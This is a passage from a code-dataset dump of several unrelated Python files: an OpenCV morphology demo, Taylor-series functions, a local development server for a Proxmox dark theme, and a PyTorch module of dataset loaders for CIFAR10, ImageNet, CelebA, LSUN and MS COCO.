1000]);\nplt.show()\n\n\n","repo_name":"chu412/Physical-modelling","sub_path":"Тема_Статистическая физика/brownian_motion_2.py","file_name":"brownian_motion_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36577291335","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main():\n img = cv2.imread('2.jpg', 0)\n _, thresh = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n # erosion\n kernel = np.ones((11, 11), np.uint8)\n erosion = cv2.erode(thresh, kernel, iterations=1)\n # dilation\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n # Opening\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n # Closing\n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n # Display Images\n plt.subplot(321), plt.imshow(img, cmap = 'gray'), plt.axis('off')\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(322),plt.imshow(thresh, cmap = 'gray')\n plt.title('Binary Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(323),plt.imshow(erosion, cmap = 'gray')\n plt.title('Eroded Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(324),plt.imshow(dilation, cmap = 'gray')\n plt.title('Dilated Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(325),plt.imshow(opening, cmap = 'gray')\n plt.title('Opening Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(326),plt.imshow(closing, cmap = 'gray')\n plt.title('Closing Image'), plt.xticks([]), plt.yticks([])\n plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"himanshuMaheshwari2311/Image-Processing-Lab","sub_path":"image-morphology/morphological_operation.py","file_name":"morphological_operation.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8937971730","text":"def factorial(n):\n if n == 0:\n return 1.0\n else:\n return n * factorial(n-1)\n\n\ndef taylor_exp(n):\n return [1.0/factorial(i) for i in range(n)]\n\n\ndef taylor_sin(n):\n res = []\n for i in range(n):\n if i % 2 == 1:\n res.append((-1)**((i-1)/2)/float(factorial(i)))\n else:\n res.append(0.0)\n return res\n\n\ndef benchmark():\n taylor_exp(500)\n taylor_sin(500)\n\n\nif __name__ == '__main__':\n benchmark()\n #python -m cProfile -o prof.out taylor.py\n #pyprof2calltree -i prof.out -o prof.calltree\n #kcachegrind prof.calltree # or qcachegrind prof.calltree\n #you can use instructions at https://github.com/rkern/line_profiler. kernprof.py -l -v simul.py","repo_name":"andrey-ladygin-loudclear/deep-learning","sub_path":"helper/factorial/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1387060843","text":"# Script to assist with PVEDiscordDark development\r\n#\r\n# By default serves HTTP on port 3000, any *.js request gets the JS script, any *.css request gets the CSS file and any image request gets corresponding image\r\n# Meant to be used with the \"Requestly\" browser extension to redirect PVEDD requests from PVE server to localhost:3000\r\n#\r\n\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport json\r\nimport os\r\n\r\nPORT = 3000\r\nDIR_SASS = os.path.join(os.path.dirname(__file__), \"sass\")\r\nDIR_IMAGES = os.path.join(os.path.dirname(__file__), \"images\")\r\nDIR_JS = os.path.join(os.path.dirname(__file__), \"js\")\r\n\r\n\r\nclass Server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n\r\n def _set_headers(self, status, type):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", type)\r\n self.end_headers()\r\n\r\n def do_GET(self):\r\n status = 200\r\n type = \"application/json\"\r\n data = None\r\n\r\n file = self.path.rpartition(\"/\")[2]\r\n ext = file.rpartition(\".\")[2]\r\n\r\n if ext == \"css\":\r\n data = open(os.path.join(DIR_SASS, \"PVEDiscordDark.css\"), \"rb\").read()\r\n type = \"text/css\"\r\n elif ext == \"js\":\r\n data = open(os.path.join(DIR_JS, \"PVEDiscordDark.js\"), \"rb\").read()\r\n type = \"application/javascript\"\r\n elif ext == \"png\" or ext == \"jpg\" or ext == \"jpeg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/{ext}\"\r\n except FileNotFoundError:\r\n status = 404\r\n elif ext == \"svg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/svg+xml\"\r\n except FileNotFoundError:\r\n status = 404\r\n else:\r\n status = 400\r\n self._set_headers(status, type)\r\n if status == 200:\r\n self.wfile.write(data)\r\n else:\r\n self.wfile.write(json.dumps({\"error\": status}).encode())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f\"Serving on localhost:{PORT}\")\r\n server = HTTPServer(server_address=(\"\", PORT), RequestHandlerClass=Server)\r\n try:\r\n server.serve_forever()\r\n except KeyboardInterrupt:\r\n quit()\r\n","repo_name":"Weilbyte/PVEDiscordDark","sub_path":"PVEDiscordDark/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"16"} +{"seq_id":"74164189127","text":"from torch.utils.data import Dataset\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom PIL import Image\nimport os\nimport glob\nimport einops\nimport torchvision.transforms.functional as F\n\n\nclass UnlabeledDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n data = tuple(self.dataset[item][:-1]) # remove label\n if len(data) == 1:\n data = data[0]\n return data\n\n\nclass LabeledDataset(Dataset):\n def __init__(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item], self.labels[item]\n\n\nclass CFGDataset(Dataset): # for classifier free guidance\n def __init__(self, dataset, p_uncond, empty_token):\n self.dataset = dataset\n self.p_uncond = p_uncond\n self.empty_token = empty_token\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n x, label = self.dataset[item]\n y = 0\n if type(label) == np.ndarray: # If need to keep the label\n if label[1] == 1: # if label[1] == 1, this is a true label or high confidence prediction, Keep labels\n y = label[0]\n elif label[1] != 0: # for exp6\n if random.random() < self.p_uncond * (1-label[1]):\n y = self.empty_token\n else:\n y = label[0]\n elif random.random() < self.p_uncond: # set label none with probability p_uncond\n y = self.empty_token\n else: # keep the label if not set to none\n y = label[0]\n\n else: # if label is not a numpy array, then we don't need to keep labels\n if random.random() < self.p_uncond:\n y = self.empty_token\n else:\n y = label\n\n return x, np.int64(y)\n\n\nclass DatasetFactory(object):\n\n def __init__(self):\n self.train = None\n self.test = None\n\n def get_split(self, split, labeled=False):\n if split == \"train\":\n dataset = self.train\n elif split == \"test\":\n dataset = self.test\n else:\n raise ValueError\n\n if self.has_label:\n return dataset if labeled else UnlabeledDataset(dataset)\n else:\n assert not labeled\n return dataset\n\n def unpreprocess(self, v): # to B C H W and [0, 1]\n v = 0.5 * (v + 1.)\n v.clamp_(0., 1.)\n return v\n\n @property\n def has_label(self):\n return True\n\n @property\n def data_shape(self):\n raise NotImplementedError\n\n @property\n def data_dim(self):\n return int(np.prod(self.data_shape))\n\n @property\n def fid_stat(self):\n return None\n\n def sample_label(self, n_samples, device):\n raise NotImplementedError\n\n def label_prob(self, k):\n raise NotImplementedError\n\n\n# CIFAR10\n\nclass CIFAR10(DatasetFactory):\n r\"\"\" CIFAR10 dataset\n\n Information of the raw dataset:\n train: 50,000\n test: 10,000\n shape: 3 * 32 * 32\n \"\"\"\n\n def __init__(self, path, random_flip=False, cfg=False, p_uncond=None, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n transform_train = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n transform_test = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n if random_flip: # only for train\n transform_train.append(transforms.RandomHorizontalFlip())\n transform_train = transforms.Compose(transform_train)\n transform_test = transforms.Compose(transform_test)\n self.train = datasets.CIFAR10(path, train=True, transform=transform_train, download=True)\n self.test = datasets.CIFAR10(path, train=False, transform=transform_test, download=True)\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n self.train.targets = np.load(cluster_path)\n assert len(self.train.targets) == 50000\n self.K = max(self.train.targets) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.train.targets) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 3, 32, 32\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_cifar10_train_pytorch.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# ImageNet\n\n\nclass FeatureDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n self.path = path\n # names = sorted(os.listdir(path))\n # self.files = [os.path.join(path, name) for name in names]\n\n def __len__(self):\n return 1_281_167 * 2 # consider the random flip\n\n def __getitem__(self, idx):\n path = os.path.join(self.path, f'{idx}.npy')\n z, label = np.load(path, allow_pickle=True)\n return z, label\n\n\nclass ImageNet256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet256_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet512Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet512_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet(DatasetFactory):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n if fnames_path == '':\n fnames_path = None\n\n print(f'Counting ImageNet files from {path}')\n train_files = _list_image_files_recursively(os.path.join(path, 'train'))\n class_names = [os.path.basename(path).split(\"_\")[0] for path in train_files]\n sorted_classes = {x: i for i, x in enumerate(sorted(set(class_names)))}\n train_labels = [sorted_classes[x] for x in class_names]\n print('Finish counting ImageNet files')\n\n self.train = ImageDataset(resolution, train_files, labels=train_labels, random_crop=random_crop, random_flip=random_flip)\n self.resolution = resolution\n if len(self.train) != 1_281_167:\n print(f'Missing train samples: {len(self.train)} < 1281167')\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n _cluster_labels = np.load(cluster_path)\n _fnames = torch.load(fnames_path)\n fnames_cluster_labels = dict(zip(_fnames, _cluster_labels))\n self.train.labels = [fnames_cluster_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n\n self.K = max(self.train.labels) + 1\n cnt = dict(zip(*np.unique(self.train.labels, return_counts=True)))\n self.cnt = torch.tensor([cnt[k] for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / len(self.train.labels) for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt[:10]: {self.cnt[:10]}')\n print(f'frac[:10]: {self.frac[:10]}')\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet{self.resolution}_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\nclass ImageNet_semi(ImageNet):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None, is_true_labels_path=None):\n super().__init__(path, resolution, random_crop, random_flip, cluster_path, fnames_path)\n assert is_true_labels_path is not None\n print(f'concat label with is_true_label from {is_true_labels_path}')\n _fnames = torch.load(fnames_path)\n _is_true_labels = torch.load(is_true_labels_path)\n fnames_is_true_labels = dict(zip(_fnames, _is_true_labels))\n isTruelabels = [fnames_is_true_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n self.train.labels = [(label, isTruelabel) for label, isTruelabel in zip(self.train.labels, isTruelabels)]\n\n\ndef _list_image_files_recursively(data_dir):\n results = []\n for entry in sorted(os.listdir(data_dir)):\n full_path = os.path.join(data_dir, entry)\n ext = entry.split(\".\")[-1]\n if \".\" in entry and ext.lower() in [\"jpg\", \"jpeg\", \"png\", \"gif\"]:\n results.append(full_path)\n elif os.listdir(full_path):\n results.extend(_list_image_files_recursively(full_path))\n return results\n\n\nclass ImageDataset(Dataset):\n def __init__(\n self,\n resolution,\n image_paths,\n labels,\n random_crop=False,\n random_flip=True,\n ):\n super().__init__()\n self.resolution = resolution\n self.image_paths = image_paths\n self.labels = labels\n self.random_crop = random_crop\n self.random_flip = random_flip\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n path = self.image_paths[idx]\n pil_image = Image.open(path)\n pil_image.load()\n pil_image = pil_image.convert(\"RGB\")\n\n if self.random_crop:\n arr = random_crop_arr(pil_image, self.resolution)\n else:\n arr = center_crop_arr(pil_image, self.resolution)\n\n if self.random_flip and random.random() < 0.5:\n arr = arr[:, ::-1]\n\n arr = arr.astype(np.float32) / 127.5 - 1\n\n label = np.array(self.labels[idx], dtype=np.float64)\n return np.transpose(arr, [2, 0, 1]), label\n\n\ndef center_crop_arr(pil_image, image_size):\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * image_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = image_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = (arr.shape[0] - image_size) // 2\n crop_x = (arr.shape[1] - image_size) // 2\n return arr[crop_y : crop_y + image_size, crop_x : crop_x + image_size]\n\n\ndef random_crop_arr(pil_image, image_size, min_crop_frac=0.8, max_crop_frac=1.0):\n min_smaller_dim_size = math.ceil(image_size / max_crop_frac)\n max_smaller_dim_size = math.ceil(image_size / min_crop_frac)\n smaller_dim_size = random.randrange(min_smaller_dim_size, max_smaller_dim_size + 1)\n\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * smaller_dim_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = smaller_dim_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = random.randrange(arr.shape[0] - image_size + 1)\n crop_x = random.randrange(arr.shape[1] - image_size + 1)\n return arr[crop_y: crop_y + image_size, crop_x: crop_x + image_size]\n\n\n# CelebA\n\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\n\nclass CelebA(DatasetFactory):\n r\"\"\" train: 162,770\n val: 19,867\n test: 19,962\n shape: 3 * width * width\n \"\"\"\n\n def __init__(self, path, resolution=64, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n self.resolution = resolution\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n\n transform = transforms.Compose([Crop(x1, x2, y1, y2), transforms.Resize(self.resolution),\n transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize(0.5, 0.5)])\n self.train = datasets.CelebA(root=path, split=\"train\", target_type=[], transform=transform, download=True)\n self.train = UnlabeledDataset(self.train)\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_celeba64_train_50000_ddim.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# LSUN Bedroom\n\n\nclass LSUNBedroom(DatasetFactory):\n def __init__(self, path, resolution=64):\n super().__init__()\n self.resolution = resolution\n transform = transforms.Compose([transforms.Resize(resolution), transforms.CenterCrop(resolution),\n transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = UnlabeledDataset(datasets.LSUN(root=path, classes=[\"bedroom_train\"], transform=transform)) \\\n if os.path.exists(os.path.join(path, 'bedroom_train_lmdb')) else None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom{self.resolution}_train_50000.npz'\n\n @property\n def has_label(self):\n return False\n\n\nclass ImageDataset2(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n names = sorted(os.listdir(path))\n self.local_images = [os.path.join(path, name) for name in names]\n self.transform = transform\n\n def __len__(self):\n return len(self.local_images)\n\n def __getitem__(self, idx):\n X = Image.open(self.local_images[idx])\n if self.transform is not None:\n X = self.transform(X)\n return X\n\n\nclass LSUNBedroom64(DatasetFactory):\n def __init__(self, path, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n train_path = os.path.join(path, 'lsun_bedroom64_train')\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = ImageDataset2(path=train_path, transform=transform) if os.path.exists(train_path) else None\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom64_train_50000.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# MS COCO\n\n\ndef center_crop(width, height, img):\n resample = {'box': Image.BOX, 'lanczos': Image.LANCZOS}['lanczos']\n crop = np.min(img.shape[:2])\n img = img[(img.shape[0] - crop) // 2: (img.shape[0] + crop) // 2,\n (img.shape[1] - crop) // 2: (img.shape[1] + crop) // 2]\n try:\n img = Image.fromarray(img, 'RGB')\n except:\n img = Image.fromarray(img)\n img = img.resize((width, height), resample)\n\n return np.array(img).astype(np.uint8)\n\n\nclass MSCOCODatabase(Dataset):\n def __init__(self, root, annFile, size=None):\n from pycocotools.coco import COCO\n self.root = root\n self.height = self.width = size\n\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n def _load_image(self, key: int):\n path = self.coco.loadImgs(key)[0][\"file_name\"]\n return Image.open(os.path.join(self.root, path)).convert(\"RGB\")\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n image = self._load_image(key)\n image = np.array(image).astype(np.uint8)\n image = center_crop(self.width, self.height, image).astype(np.float32)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = einops.rearrange(image, 'h w c -> c h w')\n\n anns = self._load_target(key)\n target = []\n for ann in anns:\n target.append(ann['caption'])\n\n return image, target\n\n\ndef int2bit(x, n=8):\n x = einops.rearrange(x, '... -> ... ()')\n x = np.right_shift(x, np.arange(n))\n x = x % 2\n return x\n\n\ndef bit2int(x):\n n = x.shape[-1]\n if isinstance(x, np.ndarray):\n return (x * (2 ** np.arange(n))).sum(axis=-1)\n elif isinstance(x, torch.Tensor):\n return (x * (2 ** torch.arange(n, device=x.device))).sum(dim=-1)\n else:\n raise NotImplementedError\n\n\nclass _BitMSCOCOText(Dataset):\n def __init__(self, annFile):\n from pycocotools.coco import COCO\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n from transformers import CLIPTokenizer\n self.tokenizer = CLIPTokenizer.from_pretrained(\"openai/clip-vit-large-patch14\")\n self.n_bits = self.tokenizer.vocab_size.bit_length()\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n anns = self._load_target(key)\n ann = random.choice(anns)['caption'] # string\n\n x = self.tokenizer(ann, truncation=True, max_length=77, return_length=True,\n return_overflowing_tokens=False, padding=\"max_length\", return_tensors=\"pt\")[\"input_ids\"]\n x = x.squeeze(dim=0) # tokens\n x = x.numpy()\n x = int2bit(x, self.n_bits) # {0, 1}\n x = 2 * torch.tensor(x, dtype=torch.float32) - 1 # {-1., 1.}\n return x\n\n\nclass BitMSCOCOText(DatasetFactory):\n def __init__(self, path):\n super().__init__()\n self.train = _BitMSCOCOText(os.path.join(path, 'annotations', 'captions_train2014.json'))\n\n def unpreprocess(self, v): # to str\n # v: {-1., 1.}\n v = v > 0 # B L N\n v = bit2int(v).cpu().detach() # B L\n ss = []\n for _v in v:\n _v = list(filter(lambda x: 0 <= x <= self.train.tokenizer.vocab_size - 1, _v))\n s = self.train.tokenizer.decode(_v, skip_special_tokens=True)\n ss.append(s)\n return ss\n\n @property\n def data_shape(self):\n return 77, 16\n\n @property\n def has_label(self):\n return False\n\n\ndef get_feature_dir_info(root):\n files = glob.glob(os.path.join(root, '*.npy'))\n files_caption = glob.glob(os.path.join(root, '*_*.npy'))\n num_data = len(files) - len(files_caption)\n n_captions = {k: 0 for k in range(num_data)}\n for f in files_caption:\n name = os.path.split(f)[-1]\n k1, k2 = os.path.splitext(name)[0].split('_')\n n_captions[int(k1)] += 1\n return num_data, n_captions\n\n\nclass MSCOCOFeatureDataset(Dataset):\n # the image features are got through sample\n def __init__(self, root):\n self.root = root\n self.num_data, self.n_captions = get_feature_dir_info(root)\n\n def __len__(self):\n return self.num_data\n\n def __getitem__(self, index):\n z = np.load(os.path.join(self.root, f'{index}.npy'))\n k = random.randint(0, self.n_captions[index] - 1)\n c = np.load(os.path.join(self.root, f'{index}_{k}.npy'))\n return z, c\n\n\ndef get_karpathy_val_split_gts(path): # the ground truth for calculating captioning metrics, e.g., BLEU\n split_file = os.path.join(path, f'val_ids.npy')\n split_info = np.load(split_file)\n from pycocotools.coco import COCO\n coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n gts = {}\n for fname, key in split_info:\n key = int(key)\n if 'train' in fname:\n gts[key] = coco_train2014.loadAnns(coco_train2014.getAnnIds(key))\n else:\n gts[key] = coco_val2014.loadAnns(coco_val2014.getAnnIds(key))\n return gts\n\n\nclass MSCOCOFeatureDatasetKarpathySplit(Dataset):\n def __init__(self, path, split, ret_key=False):\n self.path = path\n self.ret_key =ret_key\n split_file = os.path.join(path, f'{split}_ids.npy')\n self.split_info = np.load(split_file)\n\n from pycocotools.coco import COCO\n self.coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n self.coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n self.coco_train2014_keys = list(sorted(self.coco_train2014.imgs.keys()))\n self.coco_val2014_keys = list(sorted(self.coco_val2014.imgs.keys()))\n self.coco_train2014_keys_indexes = {key: index for index, key in enumerate(self.coco_train2014_keys)}\n self.coco_val2014_keys_indexes = {key: index for index, key in enumerate(self.coco_val2014_keys)}\n\n self.coco_train2014_num_data, self.coco_train2014_n_captions = get_feature_dir_info(os.path.join(path, 'train'))\n self.coco_val2014_num_data, self.coco_val2014_n_captions = get_feature_dir_info(os.path.join(path, 'val'))\n\n\n def __len__(self):\n return len(self.split_info)\n\n def __getitem__(self, index):\n fname, key = self.split_info[index]\n key = int(key)\n if key in self.coco_train2014_keys_indexes:\n assert key not in self.coco_val2014_keys_indexes\n assert 'train' in fname\n index = self.coco_train2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'train', f'{index}.npy'))\n k = random.randint(0, self.coco_train2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'train', f'{index}_{k}.npy'))\n else:\n assert key not in self.coco_train2014_keys_indexes\n assert 'val' in fname\n index = self.coco_val2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'val', f'{index}.npy'))\n k = random.randint(0, self.coco_val2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'val', f'{index}_{k}.npy'))\n if self.ret_key:\n return z, c, key\n else:\n return z, c\n\n\nclass MSCOCO256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder & the contexts calculated by clip\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDataset(os.path.join(path, 'train'))\n self.test = MSCOCOFeatureDataset(os.path.join(path, 'val'))\n assert len(self.train) == 82783\n assert len(self.test) == 40504\n print('Prepare dataset ok')\n\n self.empty_context = np.load(os.path.join(path, 'empty_context.npy'))\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.empty_context)\n\n # text embedding extracted by clip\n # for visulization in t2i\n self.prompts, self.contexts = [], []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis')), key=lambda x: int(x.split('.')[0])):\n prompt, context = np.load(os.path.join(path, 'run_vis', f), allow_pickle=True)\n self.prompts.append(prompt)\n self.contexts.append(context)\n self.contexts = np.array(self.contexts)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_mscoco256_val.npz'\n\n\nclass MSCOCO256FeaturesKarpathy(DatasetFactory): # only for i2t\n def __init__(self, path):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDatasetKarpathySplit(path, 'train')\n self.test = MSCOCOFeatureDatasetKarpathySplit(path, 'val', ret_key=True) # for validation\n assert len(self.train) == 113287\n print('Prepare dataset ok')\n\n self.val_gts = get_karpathy_val_split_gts(path)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n\ndef get_dataset(name, **kwargs):\n if name == 'cifar10':\n return CIFAR10(**kwargs)\n elif name == 'imagenet':\n return ImageNet(**kwargs)\n elif name == 'imagenet256_features':\n return ImageNet256Features(**kwargs)\n elif name == 'imagenet512_features':\n return ImageNet512Features(**kwargs)\n elif name == 'celeba':\n return 